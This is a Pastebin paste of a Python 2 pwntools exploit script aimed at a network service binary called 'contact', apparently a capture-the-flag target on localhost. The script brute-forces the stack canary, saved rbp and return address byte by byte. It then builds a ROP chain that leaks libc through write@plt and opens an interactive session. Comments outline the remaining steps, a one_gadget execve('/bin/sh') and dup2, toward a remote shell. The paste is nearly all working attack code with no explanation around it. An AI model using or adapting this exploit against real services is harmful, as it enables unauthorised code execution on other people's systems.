Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- from pwn import *
- from struct import pack
- exe = context.binary = ELF('contact')
- libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
- host = args.HOST or '127.0.0.1'
- port = int(args.PORT or 1337)
- def remote(argv=[], *a, **kw):
- '''Connect to the process on the remote host'''
- io = connect(host, port)
- return io
- def start(argv=[], *a, **kw):
- '''Start the exploit against the target.'''
- return remote(argv, *a, **kw)
- # Bruteforce an 8-byte rbp register
- def bruteforce(payload):
- ret = ''
- context.log_level = 'error'
- for b in range(8):
- for v in range(256):
- io = start()
- io.recvline()
- dummy = ret + chr(v)
- io.send(payload + dummy)
- try:
- result = io.recvline()
- ret = dummy
- print "bytes: " + hex(u64(ret.ljust(8, '\x00')))
- break
- except:
- continue
- finally:
- io.close()
- context.log_level = 'info'
- return ret
- # Bruteforce an 8-byte canary (technically on 7, because first byte is \x00)
- def bruteforce_canary(payload):
- canary = '\x00'
- context.log_level = 'error'
- for b in range(7):
- for v in range(256):
- io = start()
- io.recvline()
- dummy = canary + chr(v)
- # If the byte is correct Done. will be returned
- io.send(payload + dummy)
- try:
- result = io.recvline()
- canary = dummy
- print "canary: " + hex(u64(canary.ljust(8, '\x00')))
- break
- except:
- continue
- finally:
- io.close()
- context.log_level = 'info'
- return canary
- # Use this one_gadget and not write manual ROP chains
- # 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
- # constraints:
- # rcx == NULL
- # -- Exploit goes here --
- # Plan of action:
- # Using fd
- # First fill stack with stuff up to address 0x38
- # Bruteforce the 8-byte canary starting with \x00
- # Bruteforce the 8-byte rbp starting with \x7f (or potentially \x7d or \x7e so bruteforce an extra 2 bits)
- # Bruteforce the 8-byte return address (according to will should begin with a 55 or 56)
- # ROP Chain:
- # Get .text base by subtracting the return address with its offset in the ELF binary
- # leak libc using write@plt(4, write@got, 8)
- # Get libc base by subtracting the offset from write in libc ELF binary
- # Get dup2's address
- payload = fit({}, length=0x38)
- # Brute force canary
- # canary = bruteforce_canary(payload)
- canary = p64(0x2e51750513e03a00)
- log.info('final canary: ' + hex(u64(canary)))
- payload += canary
- # Brute force rbp
- # rbp = bruteforce(payload)
- rbp = p64(0x7ffd889dae00)
- log.info('final rbp: ' + hex(u64(rbp)))
- payload += rbp
- # Brute force return address
- # ret = bruteforce(payload)
- ret = p64(0x55fdc4aee502)
- log.info('final ret: ' + hex(u64(ret)))
- # Get .text base
- text_base = u64(ret) - 0x14ee # 14ee is the address of the function that is being returned to
- exe.address = text_base
- log.info('.text begins at ' + hex(text_base))
- payload += p64(exe.address + 0x00001562) # Jump to finish the vulnerable function
- # Leak libc by calling write@plt(4, write@got, 8)
- rop1 = ROP(exe)
- rop1.call(exe.plt.write, [4, exe.got.write, 8])
- log.info('write@plt(4, write@got, 8):\n' + rop1.dump())
- payload += rop1.chain()
- io = start()
- io.recvline()
- io.send(payload)
- io.recvline()
- io.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement